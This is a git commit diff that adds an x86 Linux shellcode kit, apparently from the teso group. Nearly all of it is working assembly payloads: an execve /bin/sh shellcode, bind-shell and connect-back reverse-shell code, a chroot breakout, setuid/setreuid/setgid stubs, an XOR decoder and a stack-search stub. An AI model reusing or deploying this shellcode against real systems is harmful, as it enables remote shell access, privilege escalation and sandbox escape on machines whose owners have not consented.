From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/x86_linux/AUTHORS | 5 ++ other/shellkit/x86_linux/chmod.s | 23 +++++++++ other/shellkit/x86_linux/chroot.s | 34 +++++++++++++ other/shellkit/x86_linux/codedump | Bin 0 -> 6244 bytes other/shellkit/x86_linux/connect.s | 61 +++++++++++++++++++++++ other/shellkit/x86_linux/execve | Bin 0 -> 5988 bytes other/shellkit/x86_linux/execve.s | 22 +++++++++ other/shellkit/x86_linux/exit.s | 14 ++++++ other/shellkit/x86_linux/portshell.s | 73 +++++++++++++++++++++++++++ other/shellkit/x86_linux/portshell_slice.s | 77 +++++++++++++++++++++++++++++ other/shellkit/x86_linux/read.s | 22 +++++++++ other/shellkit/x86_linux/setgid.s | 14 ++++++ other/shellkit/x86_linux/setreuid.s | 16 ++++++ other/shellkit/x86_linux/setuid.s | 14 ++++++ other/shellkit/x86_linux/spset.s | 36 ++++++++++++++ other/shellkit/x86_linux/xor.s | 24 +++++++++ 16 files changed, 435 insertions(+) create mode 100644 other/shellkit/x86_linux/AUTHORS create mode 100644 other/shellkit/x86_linux/chmod.s create mode 100644 other/shellkit/x86_linux/chroot.s create mode 100644 other/shellkit/x86_linux/codedump create mode 100644 other/shellkit/x86_linux/connect.s create mode 100644 other/shellkit/x86_linux/execve create mode 100644 other/shellkit/x86_linux/execve.s create mode 100644 other/shellkit/x86_linux/exit.s create mode 100644 other/shellkit/x86_linux/portshell.s create mode 100644 other/shellkit/x86_linux/portshell_slice.s create mode 100644 other/shellkit/x86_linux/read.s create mode 100644 other/shellkit/x86_linux/setgid.s create mode 100644 other/shellkit/x86_linux/setreuid.s create mode 100644 other/shellkit/x86_linux/setuid.s create mode 100644 other/shellkit/x86_linux/spset.s create mode 100644 other/shellkit/x86_linux/xor.s (limited to 'other/shellkit/x86_linux') diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS new file mode 100644 index 0000000..e5ad29f --- /dev/null +++ b/other/shellkit/x86_linux/AUTHORS @@ -0,0 +1,5 @@ +files by: +palmers / teso + +changed by: +lorian / teso diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s new file mode 100644 index 0000000..63efd8b --- /dev/null +++ b/other/shellkit/x86_linux/chmod.s @@ -0,0 +1,23 @@ + + .globl cbegin + .globl cend + + +cbegin: + jmp file + +chmod: + xorl %eax, %eax + popl %ebx + movb %al, 0x4(%ebx) + movl $0x41414141, %ecx + + movb $0xf, %al + int $0x80 + +file: + call chmod + .ascii "" + +cend: + diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s new file mode 100644 index 0000000..dd7e878 --- /dev/null +++ b/other/shellkit/x86_linux/chroot.s @@ -0,0 +1,34 @@ + .globl cbegin + .globl cend + + +cbegin: +/* mkdir AA.. */ + cdq + movl $0x73507350, %ecx + push %eax + push $0x2e2e4141 + movl %esp, %ebx + movb $0x27, %al + int $0x80 + +/* chroot AA.. */ + movb $0x3d, %al + int $0x80 + +/* chdir .. x 5 */ + addb $0x2, %bl + +cd_loop: + incb %dl + movb $0xc, %al + int $0x80 + cmp $0x6a, %dl + jne cd_loop + +/* chroot . */ + incb %bl + movb $0x3d, %al + int $0x80 +cend: + diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump new file mode 100644 index 0000000..fe9bb8e Binary files /dev/null and b/other/shellkit/x86_linux/codedump differ diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s new file mode 100644 index 0000000..452a1d4 --- /dev/null +++ b/other/shellkit/x86_linux/connect.s @@ -0,0 +1,61 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* connect */ + movl $0x41414141, %ecx + xorl $0x4041413e, %ecx /* address: 127.0.0.1 */ + push %ecx + pushw $0x7450 + pushw %dx + movl %esp, %ecx + movl %eax, %edx + + push $0x10 + push %ecx + push %edx + movl %esp, %ecx + + movb $0x03, %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %edx, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve new file mode 100644 index 0000000..3a17d3f Binary files /dev/null and b/other/shellkit/x86_linux/execve differ diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s new file mode 100644 index 0000000..2fdb69f --- /dev/null +++ b/other/shellkit/x86_linux/execve.s @@ -0,0 +1,22 @@ +/* x86/linux execve /bin/sh shellcode + * + * lorian / teso + */ + + .globl cbegin + .globl cend + +cbegin: + pushl $0x0b + popl %eax + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s new file mode 100644 index 0000000..1fe28f6 --- /dev/null +++ b/other/shellkit/x86_linux/exit.s @@ -0,0 +1,14 @@ +/* x86/linux exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl cend + +cbegin: + + xorl %eax, %eax + incl %eax + int $0x80 + +cend: diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s new file mode 100644 index 0000000..31aa68c --- /dev/null +++ b/other/shellkit/x86_linux/portshell.s @@ -0,0 +1,73 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s new file mode 100644 index 0000000..0d4c7b1 --- /dev/null +++ b/other/shellkit/x86_linux/portshell_slice.s @@ -0,0 +1,77 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx +/* push $0x68732F6E */ +/* push $0x69622F2F */ + pushw $0x6873 + pushw $0x2f6e + pushw $0x6962 + pushw $0x2f2f + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s new file mode 100644 index 0000000..870d125 --- /dev/null +++ b/other/shellkit/x86_linux/read.s @@ -0,0 +1,22 @@ + .globl cbegin + .globl cend + +cbegin: + jmp cend + +rrr: + movb $0xfa, %dl /* length */ + + popl %ecx /* position */ + + push $0x41 + pop %ebx + xorb $0x41, %bl + + push $0x3 + pop %eax + int $0x80 /* read */ + +cend: + call rrr + diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s new file mode 100644 index 0000000..0786804 --- /dev/null +++ b/other/shellkit/x86_linux/setgid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushb $0x2e + popl %eax + movw $0x4141, %ebx + xorw $0x4242, %ebx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s new file mode 100644 index 0000000..c976312 --- /dev/null +++ b/other/shellkit/x86_linux/setreuid.s @@ -0,0 +1,16 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushl $0x46 + popl %eax + movw $0x4141, %ebx + xorw $0x4141, %ebx + movw $0x4242, %ecx + xorw $0x4242, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s new file mode 100644 index 0000000..e78410a --- /dev/null +++ b/other/shellkit/x86_linux/setuid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushb $0x17 + popl %eax + movw $0x4141, %ebx + xorw $0x4242, %ebx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_linux/spset.s @@ -0,0 +1,36 @@ +/* x86 spset shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +/* searches for 512 bytes "free" space on stack without destroying it + * like any kind of call would do... + * + * NOTE: your real shellcode must be terminated with + * \x78\x56\x34\x12 for this code to work... + */ + +_cbegin: +cbegin: + + movl $0x12345678, %eax +a: + cdq + movb $0x02, %dh +b: + popl %ebx + pushl %ebx + incl %esp + decl %edx + jz c + cmpl %eax, %ebx + je a + jmp b +c: + +_cend: +cend: diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s new file mode 100644 index 0000000..29e3b78 --- /dev/null +++ b/other/shellkit/x86_linux/xor.s @@ -0,0 +1,24 @@ + .globl cbegin + .globl cend + +cbegin: + jmp XOR_down + +XOR_up: + popl %ebx + movb $0x26, %cl /* lenght */ + +XORLoop: + xorb $0x64, %bl /* xor key */ + incl %ebx + dec %cl + jnz XORLoop + jmp XORLoopDone + +XOR_down: + call XOR_up + +XORLoopDone: + .ascii "" + +cend: -- cgit v1.3